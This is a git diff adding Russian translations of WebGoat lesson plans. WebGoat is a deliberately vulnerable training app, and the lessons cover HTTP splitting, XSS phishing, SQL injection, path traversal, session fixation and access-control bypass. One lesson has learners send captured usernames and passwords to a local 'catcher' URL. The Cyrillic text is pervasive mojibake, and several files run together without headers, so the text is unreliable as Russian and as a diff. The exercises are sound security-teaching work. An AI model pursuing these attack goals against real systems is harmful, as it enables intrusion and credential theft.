+предназначаютŃŃŹ для CGI-программ иŃпользŃющих метод POST для принятия информации.ĐžŃновные цели и задачи:
+
+Введите ваŃе имя в поле раŃположенное ниже и нажмите "Вперёд!" для отправки формы. Сервер примет Đ˛Đ°Ń Đ·Đ°ĐżŃ€ĐľŃ, выŃтроит
+полŃченнŃŃŽ ŃŃ‚Ń€ĐľĐşŃ Đ˛ обратном порядке и выведет резŃльтат на экран. Данный пример иллюŃтрирŃет ĐľŃновы обработки данных
+полŃченных из HTTP-запроŃĐ°.
+
+
Название Ńрока: Проверка HttpOnly
+
Тема для изŃчения:
+
+Для того чтоб помеŃĐ°Ń‚ŃŚ проведению XSS-нападений компания Microsoft
+ввела новый параметр для cookies, называемый 'HttpOnly'. Đ•Ńли данный флаг
+активен, Ń‚Đľ браŃзер не разреŃает работающим на Ńтороне клиента Ńкриптам
+полŃчать Đ´ĐľŃŃ‚ŃĐż Đş cookies. Некоторые браŃзеры, Đş Ńожалению, не Ńчитывают
+наличие 'HttpOnly' в Ńвоей работе.
+СпиŃок браŃзеров поддерживающих данный параметр можно найти здеŃŃŚ: OWASP HTTPOnly Support
+
ĐžŃновные цели и задачи:
+На данном Ńроке вы должны проверить, поддерживает ли Đ˛Đ°Ń Đ±Ń€Đ°Ńзер флаг HTTPOnly применив его Đş
+cookies Ń Đ¸ĐĽĐµĐ˝ĐµĐĽ unique2u .
+Đ•Ńли Đ´Đ°, Ń‚Đľ включив его вы не Ńможете полŃчить Đ´ĐľŃŃ‚ŃĐż Đş их ŃĐľĐ´ĐµŃ€Đ¶Đ¸ĐĽĐľĐĽŃ Ń‡ĐµŃ€ĐµĐ·
+код на клиентŃкой Ńтороне. Đ’Ń‹ также не Ńможете запиŃывать новые данные в них, или изменять
+Ńже имеющиеŃŃŹ (хотя некоторые браŃзеры запрещают только Ńчитывание).
+Но при этом браŃзер иŃправно бŃдет предавать их ŃерверŃ.
+
+
Название Ńрока: Проводение Đ°Ń‚Đ°Đş HTTP Splitting
+
Тема изŃчения:
+На данном Ńроке вы ознакомитеŃŃŚ Ń Đ°Ń‚Đ°ĐşĐ°ĐĽĐ¸ клаŃŃĐ° HTTP Splitting
+
+
+Как работают такие атаки:
+
+
+ ĐŃ‚Đ°ĐşŃющий поŃылает веб-ŃĐµŃ€Đ˛ĐµŃ€Ń Đ˛Ń€ĐµĐ´ĐľĐ˝ĐľŃные данные вмеŃте Ń ĐľĐ¶Đ¸Đ´Đ°ĐµĐĽŃ‹ĐĽĐ¸. Уязвимое приложение не проверяет полŃченнŃŃŽ
+информацию на наличие Ńимволов CR (возврат коретки, обозначаетŃŃŹ Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ %0d или \r) и LF (перевод Ńтроки, обозначаетŃŃŹ
+Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ %0a или \n). Данные Ńимволы не только позволяют Đ°Ń‚Đ°ĐşŃŃŽŃ‰ĐµĐĽŃ ĐşĐľĐ˝Ń‚Ń€ĐľĐ»Đ¸Ń€ĐľĐ˛Đ°Ń‚ŃŚ возвращаемые Ńервером заголовки и тело ответа,
+но и Đ´Đ°ŃŽŃ‚ ĐµĐĽŃ Đ˛ĐľĐ·ĐĽĐľĐ¶Đ˝ĐľŃŃ‚ŃŚ Ńоздавать поддельные ответы, Ńодержимое которых бŃдет ĐµĐĽŃ ĐżĐľĐ»Đ˝ĐľŃŃ‚ŃŚŃŽ подконтрольно.
+
+
+ Đффект от таких Đ°Ń‚Đ°Đş может ŃŃиливатьŃŃŹ когда они проводятŃŃŹ вмеŃте Ń Đ°Ń‚Đ°ĐşĐ°ĐĽĐ¸ клаŃŃĐ° "Отравление кеŃĐ°" (Cache Poisoning).
+СмыŃĐ» их в отравлении кеŃĐ° жертвы по ŃредŃтвам подŃовывания ей Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ HTTP Splitting поддельной Ńтраницы,
+приŃедŃей якобы от Ńервера.
+
+
+ВмеŃте Ń ŃŤŃ‚Đ¸ĐĽ, Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ ŃязвимоŃтей позволяющих провеŃти разбиение HTTP-ответа, злоŃĐĽŃ‹Ńленник может Đ·Đ°Ńтавить Ńервер
+отоŃлать ĐşĐ»Đ¸ĐµĐ˝Ń‚Ń ĐżĐľĐ´Đ´ĐµĐ»ŃŚĐ˝Ń‹Đą заголовок Last-Modified: Ń Đ´Đ°Ń‚ĐľĐą из бŃĐ´Ńщего. От этого браŃзер клиента Ńтанет поŃылать ŃерверŃ
+неверное Ńодержимое в заголовке If-Modified-Since . Сервер, в Ńвою очередь, вŃегда бŃдет отвечать ĐşĐ»Đ¸ĐµĐ˝Ń‚Ń Ń‡Ń‚Đľ (отравленная)
+Ńтраница не изменилаŃŃŚ и клиент поŃтоянно бŃдет видеть ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń ĐżĐľĐ´ŃŃĐ˝ŃŃ‚ŃŃŽ злоŃĐĽŃ‹Ńленником.
+
+
ПроŃтой пример ответа Ń ĐşĐľĐ´ĐľĐĽ 304:
+
HTTP/1.1 304 Not Modified
+
+
ĐžŃновные цели и задачи:
+
+Данный Ńрок имеет две Ńтадии. На первой вы изŃчаете проведение Đ°Ń‚Đ°Đş HTTP Splitting, Đ° на второй наŃчитеŃŃŚ Ńовмещать
+их Ń ĐľŃ‚Ń€Đ°Đ˛Đ»ĐµĐ˝Đ¸ĐµĐĽ кеŃĐ°.
+
+Введите любой ŃŹĐ·Ń‹Đş в Ń„ĐľŃ€ĐĽŃ ĐżĐľĐ¸Ńка. ПоŃле отправки формы приложение ĐľŃŃщеŃтвит переадреŃацию на Đ´Ń€ŃĐłŃŃŽ ŃŃылкŃ,
+раŃположеннŃŃŽ на этом же Ńервере. С помощью помещения CR (%0d) и LF (%0a) в название языка вы должны изŃчить проведение Đ°Ń‚Đ°Đş
+данного типа.
+Đ’Đ°ŃĐ° цель ŃĐľŃтоит в том, чтоб Đ·Đ°Ńтавить Ńервер отправить ответ 200 ОК. Đ•Ńли Ńодержимое экрана изменитŃŃŹ от ваŃей атаки,
+проŃŃ‚Đľ перейдите на главнŃŃŽ ŃтраницŃ. Как только ŃĐ°Đł 2 бŃдет выполнен ŃŃпеŃно вы Ńвидите что в левом меню появилаŃŃŚ новая
+зелёная отметка на против этого раздела.
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/InsecureLogin.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/InsecureLogin.html
new file mode 100644
index 000000000..8340c9a06
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/InsecureLogin.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: Insecure Login
+
Тема для изŃчения:
+
+ЧŃвŃтвительная информация никогда не должна поŃылатьŃŃŹ в виде открытого текŃŃ‚Đ°!
+Многие приложения ŃŃтанавливают защищённые Ńоединения только поŃле авторизиации.
+ĐŃ‚Đľ помогает хакерам, в том плане что они могŃŃ‚ перехватить отправленные пользователем данные
+ещё Đ´Đľ ŃŃтановки им безопаŃного Ńоединения. Đ’ хороŃих веб-приложениях важная информация
+никогда не передаётŃŃŹ в открытом виде.
+ĐžŃновные цели и задачи:
+ПоŃмотрите как легко прочеŃŃ‚ŃŚ пароль передающийŃŃŹ открытым текŃтом. Так вы
+
Название Ńрока: Выполнение Đ°Ń‚Đ°Đş клаŃŃĐ° 'JSON-инъекция'
+
Тема для изŃчения:
+На данном Ńроке вы наŃчитеŃŃŚ ĐľŃŃщеŃтвлять атаки клаŃŃĐ° 'JSON-инъекция'
+
+
+Как работают такие атаки:
+
+JSON - ŃŤŃ‚Đľ проŃтой, "легковеŃный" и эффективный формат передачи данных. Данные,
+передаваемые Ń ĐµĐłĐľ помощью, могŃŃ‚ иметь различные формы. Например ŃŤŃ‚Đľ может быть ĐĽĐ°ŃŃив, ŃпиŃок, хеŃ-таблица и Ń‚.Đ´.
+JSON обычно иŃпользŃетŃŃŹ в AJAX- и Web2.0-приложениях, поŃтепенно вытеŃняя XML Đ·Đ° Ńчёт Ńвоей проŃтоты и ŃкороŃти обработки.
+Đ’ Ń‚Đľ же время JSON, как и XML, предраŃположен Đş атакам инъективного клаŃŃĐ°. Например злоŃĐĽŃ‹Ńленник может перехватить ответ
+Ńервера и внедрить в него произвольные данные.
+
+
ĐžŃновные цели и задачи:
+
+* Đ’Ń‹ летите из Đ‘ĐľŃтона, Ń Đ°ŃŤŃ€ĐľĐżĐľŃ€Ń‚Đ° Ń ĐşĐľĐ´ĐľĐĽ BOS, в Сиэтл, в аэропорт Ń ĐşĐľĐ´ĐľĐĽ SEA.
+
Название Ńрока: Обход валидации данных реализованной на клиентŃкой Ńтороне Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ JavaScript
+
Тема для изŃчения:
+ĐźŃ€ĐľĐ˛ĐµŃ€ĐşŃ Đ´Đ°Đ˝Đ˝Ń‹Ń…, реализованнŃŃŽ на клиентŃкой Ńтороне, не Ńтоит раŃŃматривать
+как какой-Ń‚Đľ механизм повыŃающий безопаŃноŃŃ‚ŃŚ приложения. Она лиŃŃŚ призвана Ńократить
+количеŃтво неверных данных обрабатываемых Ńервером, которые могŃŃ‚ поŃŃ‚Ńпать от проŃŃ‚Ń‹Ń…
+пользователей не знающих правильный формат определённых полей. ĐŃ‚Đ°ĐşŃющие могŃŃ‚
+легко обойти такие механизмы множеŃтвом ŃпоŃобов. ĐźĐľŃŤŃ‚ĐľĐĽŃ ĐżŃ€ĐľĐ˛ĐµŃ€ĐşĐ° вводимой информации на клиентŃкой Ńтороне
+обязательно должна иметь Ńвои аналог на Ńерверной чаŃти приложения. ĐŃ‚Đľ Ńильно Ńнизит возможноŃŃ‚ŃŚ
+попадания в важные механизмы приложения опаŃных данных.
+
+ĐžŃновные цели:
+На этом Ńроке веб-Ńайт проверяет Ńодержимое формы Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ определённых механизмов.
+Đ’Đ°ŃĐ° цель обойти их и отправить Ń„ĐľŃ€ĐĽŃ Ń Ń‚Đ°ĐşĐ¸ĐĽĐ¸ данными, которых Ńайт не ожидает.
+ Đ’Ń‹ должны нарŃŃить Ń€Đ°Đ±ĐľŃ‚Ń Đ˛Ńех 7 валидаторов.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html
new file mode 100644
index 000000000..66293a95c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Lesson_Plan_Template.html
@@ -0,0 +1,17 @@
+
+
+Concept / Topic To Teach:
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/LogSpoofing.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/LogSpoofing.html
new file mode 100644
index 000000000..544b2bf23
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/LogSpoofing.html
@@ -0,0 +1,20 @@
+
+
Название Ńрока: Подделка запиŃей в лог-файлах.
+
Тема для изŃчения:
+ На этом Ńроке раŃŃматриваетŃŃŹ проŃтой обман человечеŃких глаз.
+
+
+Как работает данный тип атак:
+Целью этих Đ°Ń‚Đ°Đş являетŃŃŹ подделка запиŃей лог-файла Đ·Đ° Ńчёт помещения в него Ńпециально Ńформированной Ńтроки.
+ĐŃ‚Đľ позволит Đ°Ń‚Đ°ĐşŃŃŽŃ‰ĐµĐĽŃ Đ·Đ°ĐżŃŃ‚Đ°Ń‚ŃŚ админиŃтратора и Ńкрыть Ńвои Ńледы.
+
+
ĐžŃновные цели:
+
+* Đ’ Ńером поле, раŃположенном ниже, отображаетŃŃŹ Ńодержимое которое бŃдет в неŃено в лог-файл.
+
Название Ńрока: МногоŃровневая авторизация 1
+
Тема для изŃчения:
+
+МногоŃровневая авторизация обеŃпечиваетŃŃŹ добавленим дополнительного варианта
+проверки пользователя. Например, поŃле того как вы зайдёте под Ńвоим именем и паролем, при
+ŃоверŃении важной операции приложение может попроŃить Đ˛Đ°Ń Ńказать идентификационный номер транзакции (TAN).
+Обычно такие Ńхемы иŃпользŃŃŽŃ‚ŃŃŹ в онлайн-банкинге. Банк Đ´Đ°Ń‘Ń‚ вам ŃпиŃок допŃŃтимых
+номеров транзакций которые Ńникальны для каждого клиента. Один TAN может быть иŃпользован
+только один раз. Кроме того, TAN может отправлятьŃŃŹ ĐşĐ»Đ¸ĐµĐ˝Ń‚Ń ĐżĐľ SMS. Đ’ данном ŃĐ»Ńчае
+Ńпор делаетŃŃŹ на Ń‚Đľ, что злоŃĐĽŃ‹ŃĐ»ĐµĐ˝Đ˝Đ¸ĐşŃ ĐľŃ‡ĐµĐ˝ŃŚ Ń‚Ń€Ńдно Ńзнать номера транзакций имеющиеŃŃŹ
+Ń ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŹ.
+
+ĐžŃновные цели и задачи:
+Đ’ данном Ńроке вы должны иŃŃледовать похожŃŃŽ ŃиŃтема Đ°Ńтентификации.
+ĐĐ· иŃходных данных Ń Đ˛Đ°Ń ĐµŃŃ‚ŃŚ имя пользователя, пароль и
+Ńже иŃпользованые TAN. Đ’Ń‹ должны Ńзнать принимает ли Ńервер номера транзакций ŃтавŃие недейŃтвительными.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html
new file mode 100644
index 000000000..7d77f76d9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/MultiLevelLogin2.html
@@ -0,0 +1,17 @@
+
+
Название Ńрока: МногоŃровневая авторизация 2
+
Тема для изŃчения:
+
+МногоŃровневая авторизация обеŃпечиваетŃŃŹ добавленим дополнительного варианта
+проверки пользователя. Например, поŃле того как вы зайдёте под Ńвоим именем и паролем, при
+ŃоверŃении важной операции приложение может попроŃить Đ˛Đ°Ń Ńказать идентификационный номер транзакции (TAN).
+Обычно такие Ńхемы иŃпользŃŃŽŃ‚ŃŃŹ в онлайн-банкинге. Банк Đ´Đ°Ń‘Ń‚ вам ŃпиŃок допŃŃтимых
+номеров транзакций которые Ńникальны для каждого клиента. Один TAN может быть иŃпользован
+только один раз. Кроме того, TAN может отправлятьŃŃŹ ĐşĐ»Đ¸ĐµĐ˝Ń‚Ń ĐżĐľ SMS. Đ’ данном ŃĐ»Ńчае
+Ńпор делаетŃŃŹ на Ń‚Đľ, что злоŃĐĽŃ‹ŃĐ»ĐµĐ˝Đ˝Đ¸ĐşŃ ĐľŃ‡ĐµĐ˝ŃŚ Ń‚Ń€Ńдно Ńзнать номера транзакций имеющиеŃŃŹ
+Ń ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŹ.
+ĐžŃновные цели и задачи:
+ĐŁ Đ˛Đ°Ń Ńже еŃŃ‚ŃŚ аккаŃнт для ŃиŃтемы 'WebGoat Financial', но вам Đ˝Ńжно
+войти под Đ´Ń€Ńгим аккаŃнтом зная лиŃŃŚ его логин.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/NewLesson.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/NewLesson.html
new file mode 100644
index 000000000..04197bd54
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/NewLesson.html
@@ -0,0 +1,13 @@
+
+
+Создание Ńроков WebGoat
+
+Добавлять Ńроки в WebGoat очень проŃŃ‚Đľ. Đ•Ńли Ń Đ˛Đ°Ń ĐµŃŃ‚ŃŚ хороŃĐ°ŃŹ идеяздеŃŃŚ.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/PasswordStrength.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/PasswordStrength.html
new file mode 100644
index 000000000..96a0e1bc0
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/PasswordStrength.html
@@ -0,0 +1,13 @@
+
+
Название Ńрока: СтойкоŃŃ‚ŃŚ пароля
+
Тема для изŃчения:
+
+ĐккаŃнты защищены на Ńтолько, на Ńколько защищены их пароли. Многие пользователи
+везде ŃтремятŃŃŹ иŃпользовать Ńамые проŃтые варианты паролей. Đ•Ńли вы хотите защитить их от атаки методом проŃтого
+перебора (brute-force), вам ŃледŃет предъявлять Đş ним Ńерьёзные требования. ПользовательŃкий пароль обязательно должен Ńодержать
+как минимŃĐĽ бŃквы верхнего и нижнего региŃтров и цифры. Чем длиннее пароль, тем Đ»ŃчŃе.
+
+ĐžŃновные цели и задачи:
+ ПопробŃйте проверить неŃколько иŃпользŃемых вами паролей на ŃтойкоŃŃ‚ŃŚ вот на этом ŃервиŃе - https://www.cnlab.ch/codecheck
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html
new file mode 100644
index 000000000..7c69d6e1c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/PathBasedAccessControl.html
@@ -0,0 +1,11 @@
+
+
Название Ńрока: Обход Ńхем контроля Đ´ĐľŃŃ‚Ńпа ĐľŃнованных на ĐżŃŃ‚ŃŹŃ… файловой ŃиŃтемы.
+
Тема для изŃчения:
+
+Đ’ Ńхемах контроля Đ´ĐľŃŃ‚Ńпа ĐľŃнованных на ĐżŃŃ‚ŃŹŃ… файловой ŃиŃтемы Đ°Ń‚Đ°ĐşŃющий может попытатьŃŃŹ передать приложению
+отноŃительный ĐżŃŃ‚ŃŚ, вмеŃŃ‚Đľ ожидаемых данных, для обхода ограничений безопаŃноŃти. Следовательно, злоŃĐĽŃ‹Ńленник может
+полŃчить Đ´ĐľŃŃ‚ŃĐż Đş файлам, которые находятŃŃŹ вне текŃщей директории и Đş которым при нормальной работе приложения обращатьŃŃŹ нельзя.
+
+ĐžŃновные цели и задачи:
+Пользователь должен полŃчить Đ´ĐľŃŃ‚ŃĐż Đş файлŃ, находящемŃŃŃŹ вне текŃщей директории.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/Phishing.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Phishing.html
new file mode 100644
index 000000000..a983d8e29
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/Phishing.html
@@ -0,0 +1,17 @@
+
+
Название Ńрока: ФиŃинг, ĐľŃнованный на применении XSS
+
Тема для изŃчения:
+
+Проверка вŃех принимаемых от пользователей данных вŃегда ŃчитаетŃŃŹ хороŃей практикой.
+XSS-ŃязвимоŃти возникают в том ŃĐ»Ńчае, когда непроверенные пользовательŃкие данные
+возвращаютŃŃŹ ĐµĐĽŃ Đ¶Đµ в HTTP-ответе. С иŃпользованием XSS-ŃязвимоŃтей вы можете ŃоверŃĐ°Ń‚ŃŚ
+фиŃинг-атаки или же проŃŃ‚Đľ добавлять на ŃязвимŃŃŽ ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń ĐşĐ°ĐşĐľĐµ-нибŃĐ´ŃŚ Ńтороннее Ńодержимое.
+Đ’ таких ŃитŃациях поŃетителям-жертвам очень Ń‚Ń€Ńдно отделить наŃтоящŃŃŽ информацию на Ńайте от
+поддельной.
+
+ĐžŃновные цели и задачи:
+Пользователь должен каким-либо образом добавить на ŃŃ‚Ń€Đ°Đ˝Đ¸Ń†Ń Ń„ĐľŃ€ĐĽŃ
+запроŃĐ° логина и пароля. При её отправке введённые данные должны Ńходить на адреŃ
+http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/ReflectedXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ReflectedXSS.html
new file mode 100644
index 000000000..e41ac6e48
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/ReflectedXSS.html
@@ -0,0 +1,14 @@
+
+
Название Ńрока: ĐŃпользование отражённых XSS-ŃязвимоŃтей
+
Тема для изŃчения:
+
+Đ’Ńегда хороŃей практикой ŃчиталаŃŃŚ проверка вŃех входящих данных на Ńтороне Ńервера.
+XSS-ŃязвимоŃти могŃŃ‚ возникать в тех ŃĐ»Ńчаях, когда непроверенные пользовательŃкие
+данные ŃŃ€Đ°Đ·Ń ĐżĐľĐĽĐµŃ‰Đ°ŃŽŃ‚ŃŃŹ в HTTP-ответ. Đ’ таких ŃĐ»Ńчаях нападающий может Ńформировать URL, Ńодержащий в Ńебе
+вредоноŃный код и передать его жертве(Đ°ĐĽ) через Ńторонний веб-Ńайт, ĐżĐľŃ‡Ń‚Ń Đ¸Đ»Đ¸ любым Đ´Ń€Ńгим ŃпоŃобом.
+
+ĐžŃновные цели и задачи:
+Đ’ этом Ńпражнении ваŃей целью являетŃŃŹ отправка ŃĐµŃ€Đ˛ĐµŃ€Ń Ńпециально Ńформированного
+вредоноŃного Ńообщения, которое, отобразивŃиŃŃŚ в ответной Ńтранице,ĐľŃŃщеŃтвит
+какие-нибŃĐ´ŃŚ опаŃные дейŃтвия (например выполнит произвольный JS-код).
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html
new file mode 100644
index 000000000..0b5a14085
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/RemoteAdminFlaw.html
@@ -0,0 +1,15 @@
+
+
Название Ńрока: ДоŃŃ‚ŃĐż Đş Ńкрытым реŃŃŃ€ŃĐ°ĐĽ Ńайта
+
Тема для изŃчения:
+Приложения очень чаŃŃ‚Đľ имеют админиŃтративные интерфейŃŃ‹ позволяющие привилегированным пользователям
+полŃчать Đ´ĐľŃŃ‚ŃĐż Đş Ń‚Đ°ĐşĐľĐĽŃ Ń„ŃнкционалŃ, Đş ĐşĐľŃ‚ĐľŃ€ĐľĐĽŃ ĐľĐ±Ń‹Ń‡Đ˝Ń‹Đµ пользователи не допŃŃкаютŃŃŹ. Кроме того,
+ŃĐ°ĐĽ Ńервер приложения может иметь админиŃтративный интерфейŃ.
+Стандартные адреŃĐ°:
+ĐžŃновные цели и задачи:
+
+ПопробŃйте полŃчить Đ´ĐľŃŃ‚ŃĐż Đş админиŃŃ‚Ń€Đ°Ń‚Đ¸Đ˛Đ˝ĐľĐĽŃ Đ¸Đ˝Ń‚ĐµŃ€Ń„ĐµĐąŃŃ WebGoat. Đ’Ń‹ также можете попытатьŃŃŹ обратитьŃŃŹ Đş админиŃтративномŃ
+интерфейŃŃ Tomcat. Đ Đ°ŃполагаетŃŃŹ он по адреŃŃ /admin. Обратите внимание на Ń‚Đľ что непоŃредŃтвенного отноŃения Đş Đ´Đ°Đ˝Đ˝ĐľĐĽŃ ŃрокŃ
+он не имеет.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html
new file mode 100644
index 000000000..98bff910f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/RoleBasedAccessControl.html
@@ -0,0 +1,24 @@
+
+
Название Ńрока: Контроль Đ´ĐľŃŃ‚Ńпа ĐľŃнованный на ролях
+
Тема для изŃчения:
+
+Đ’ Ńхемах ĐľŃнованных на ролях ŃĐ°ĐĽĐ° роль предŃтавляет из Ńебя набор разреŃений Đ´ĐľŃŃ‚Ńпа и привилегий.
+Пользователю одновременно может быть приŃвоена одна или более ролей.
+Подобные Ńхемы чаще вŃего включают в Ńебя два механизма: механизм работы Ń Ń€Đ°Đ·Ń€ĐµŃениями Đ´ĐľŃŃ‚Ńпа и
+механизм назначения привилегий. Đ’ ŃĐ»Ńчаях когда реализация данной Ńхемы имеет какие-Ń‚Đľ изъяны пользователь может полŃчить
+Đ´ĐľŃŃ‚ŃĐż Đş Ń„ŃнкционалŃ, Đş ĐşĐľŃ‚ĐľŃ€ĐľĐĽŃ ĐµĐĽŃ ĐľĐ±Ń€Đ°Ń‰Đ°Ń‚ŃŚŃŃŹ не разреŃено. Đли он может каким-либо образом повыŃить Ńвои
+привилегии в приложении.
+
+
+ĐžŃновные цели и задачи:
+Đ’Đ°ŃĐ° цель ŃĐľŃтоит в изŃчении правил контроля Đ´ĐľŃŃ‚Ńпа данного Ńайта.
+Каждая роль имеет разреŃения на Đ´ĐľŃŃ‚ŃĐż Đş ĐľĐżŃ€ĐµĐ´ĐµĐ»Ń‘Đ˝Đ˝ĐľĐĽŃ Ń€ĐµŃŃŃ€ŃŃ (A-F). ĐšĐ°Đ¶Đ´ĐľĐĽŃ ĐżĐľĐ»ŃŚĐ·ĐľĐ˛Đ°Ń‚ĐµĐ»ŃŽ приŃвоена одна или более ролей.
+Только пользователи имеющие роль [Admin] ĐĽĐľĐłŃ ĐżĐľĐ»Ńчать Đ´ĐľŃŃ‚ŃĐż Đş F-реŃŃŃ€ŃĐ°ĐĽ. Đ’ ŃĐ»Ńчае Ńдачного проведения атаки
+пользователь не имеющий роль [Admin] должен полŃчить Đ´ĐľŃŃ‚ŃĐż Đş F-реŃŃŃ€ŃĐ°ĐĽ.
+Учебные реŃŃŃ€ŃŃ‹:
+Схема организации
+Матрица контроля Đ´ĐľŃŃ‚Ńпа
+СтрŃктŃра базы данных
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SQLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SQLInjection.html
new file mode 100644
index 000000000..2078691e9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SQLInjection.html
@@ -0,0 +1,20 @@
+
+
Название Ńрока: Проведение SQL-инъекци
+
Тема для изŃчения:
+
+SQL-инъекции предŃтавляют из Ńебя очень ŃерьёзнŃŃŽ ŃĐłŃ€ĐľĐ·Ń Đ´Đ»ŃŹ Ńайтов ĐľŃнованных на Đ‘Đ”.
+Методы их иŃпользования Đ´ĐľŃтаточно легки в ĐľŃвоении, Đ° Ńщерб Ńоздаваемый ими огромен и
+при определённых ŃŃловиях может произойти Đş компрометации вŃей ŃиŃтемы. Тем не менее,
+количеŃтво интернет-Ńайтов Ń ŃязвимоŃтями данного типа поŃтоянно раŃŃ‚Ń‘Ń‚.
+ĐžŃновные цели и задачи:
+Đ’ данном Ńпражнении вы наŃчитеŃŃŚ иŃпользовать SQL-инъекции. Кроме того, вам Đ˝Ńжно бŃдет
+внеŃти в код правки, которые ŃŃтранят ŃŤŃ‚Ń ŃязвимоŃŃ‚ŃŚ в теŃтовом приложении.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..c7433453d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SameOriginPolicyProtection.html
@@ -0,0 +1,13 @@
+
+
Название Ńрока: Защита Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ политики одного иŃточника (Same Origin Policy)
+
Тема для изŃчения:
+
+Ключевым элементом технологии AJAX являетŃŃŹ компонент XMLHttpRequest (XHR). Он позволяет Ń ĐżĐľĐĽĐľŃ‰ŃŚŃŽ JavaScript
+отправлять запроŃŃ‹ на ŃŃ‚ĐľŃ€ĐľĐ˝Ń Ńервера в Đ°Ńинхронном режиме. ĐĐ· Ńоображений безопаŃноŃти Đ·Đ°ĐżŃ€ĐľŃ ĐĽĐľĐ¶Đ˝Đľ отправить
+только на тот домен, Ń ĐşĐľŃ‚ĐľŃ€ĐľĐłĐľ загрŃжена текŃщая Ńтраница.
+
+ĐžŃновные цели и задачи:
+Упражнение демонŃтрирŃет механизмы защиты обеŃпеченные политикой одного иŃточника (Same Origin Policy)
+Через компонент XHR можно отправлять Đ·Đ°ĐżŃ€ĐľŃ Đ»Đ¸ŃŃŚ на тот Ńервер, Ń ĐşĐľŃ‚ĐľŃ€ĐľĐłĐľ была загрŃжена текŃщая
+Ńтраница. Попытки отправить Đ·Đ°ĐżŃ€ĐľŃ Đ˝Đ° Đ´Ń€Ńгой Ńервер потерпят неŃдачŃ. ";
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/ru/SessionFixation.html b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SessionFixation.html
new file mode 100644
index 000000000..4d70c976e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/ru/SessionFixation.html
@@ -0,0 +1,31 @@
+
+
Название Ńрока: Закрепление ŃеŃŃии
+
Тема для изŃчения:
+ĐŃпользование Đ°Ń‚Đ°Đş клаŃŃĐ° 'Закрепление ŃеŃŃии'
+
+
+Как работает данный вид атак:
+
+Сервер может опознать конкретного пользователя по ŃĐ˝Đ¸ĐşĐ°Đ»ŃŚĐ˝ĐľĐĽŃ Đ¸Đ´ĐµĐ˝Ń‚Đ¸Ń„Đ¸ĐşĐ°Ń‚ĐľŃ€Ń ŃеŃŃии.
